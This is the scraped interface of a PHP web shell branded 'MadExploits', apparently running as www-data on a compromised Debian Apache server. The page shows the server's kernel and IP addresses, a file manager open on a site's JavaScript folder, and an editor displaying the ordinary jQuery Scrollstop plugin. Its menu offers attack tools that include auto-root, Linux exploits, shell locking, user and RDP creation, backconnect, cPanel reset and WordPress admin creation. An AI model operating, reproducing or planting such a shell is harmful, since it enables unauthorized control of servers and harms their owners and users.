Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.116.49.143
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web.back /
lib /
filemanagerOLD /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
ZeroClipboard.Core.js
56.3
KB
-rw-r--r--
ZeroClipboard.Core.min.js
19.94
KB
-rw-r--r--
ZeroClipboard.Core.min.map
86.24
KB
-rw-r--r--
ZeroClipboard.js
72.59
KB
-rw-r--r--
ZeroClipboard.min.js
24.98
KB
-rw-r--r--
ZeroClipboard.min.map
110.38
KB
-rw-r--r--
ZeroClipboard.swf
3.94
KB
-rw-r--r--
bootbox.min.js
6.05
KB
-rw-r--r--
bootstrap-lightbox.min.js
3.36
KB
-rw-r--r--
bootstrap-modal.min.js
5.74
KB
-rw-r--r--
bootstrap-modalmanager.min.js
5.82
KB
-rw-r--r--
bootstrap.min.js
27.87
KB
-rw-r--r--
dropzone.min.js
29.76
KB
-rw-r--r--
include.js
46.38
KB
-rw-r--r--
include.min.js
29.19
KB
-rw-r--r--
jquery-ui-1.10.4.custom.js
82.8
KB
-rw-r--r--
jquery-ui-1.10.4.custom.min.js
43
KB
-rw-r--r--
jquery.contextMenu.js
63.63
KB
-rw-r--r--
jquery.contextMenu.min.js
21.65
KB
-rw-r--r--
jquery.js
90.46
KB
-rw-r--r--
jquery.lazyload.js
8.84
KB
-rw-r--r--
jquery.lazyload.min.js
3.3
KB
-rw-r--r--
jquery.scrollstop.js
2.29
KB
-rw-r--r--
jquery.scrollstop.min.js
882
B
-rw-r--r--
jquery.touchSwipe.min.js
10.55
KB
-rw-r--r--
jquery.ui.position.js
15.3
KB
-rw-r--r--
jquery.ui.position.min.js
6.25
KB
-rw-r--r--
jquery.ui.touch-punch.min.js
1.26
KB
-rw-r--r--
modernizr.custom.js
14.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.scrollstop.js
/*! * jQuery Scrollstop Plugin v1.1.0 * https://github.com/ssorallen/jquery-scrollstop */ (function($) { // $.event.dispatch was undocumented and was deprecated in jQuery 1.7[1]. It // was replaced by $.event.handle in jQuery 1.9. // // Use the first of the available functions to support jQuery <1.8. // // [1] https://github.com/jquery/jquery-migrate/blob/master/src/event.js#L25 var dispatch = $.event.dispatch || $.event.handle; var special = $.event.special, uid1 = 'D' + (+new Date()), uid2 = 'D' + (+new Date() + 1); special.scrollstart = { setup: function(data) { var _data = $.extend({ latency: special.scrollstop.latency }, data); var timer, handler = function(evt) { var _self = this, _args = arguments; if (timer) { clearTimeout(timer); } else { evt.type = 'scrollstart'; dispatch.apply(_self, _args); } timer = setTimeout(function() { timer = null; }, _data.latency); }; $(this).bind('scroll', handler).data(uid1, handler); }, teardown: function() { $(this).unbind('scroll', $(this).data(uid1)); } }; special.scrollstop = { latency: 250, setup: function(data) { var _data = $.extend({ latency: special.scrollstop.latency }, data); var timer, handler = function(evt) { var _self = this, _args = arguments; if (timer) { clearTimeout(timer); } timer = setTimeout(function() { timer = null; evt.type = 'scrollstop'; dispatch.apply(_self, _args); }, _data.latency); }; $(this).bind('scroll', handler).data(uid2, handler); }, teardown: function() { $(this).unbind('scroll', $(this).data(uid2)); } }; })(jQuery);
Close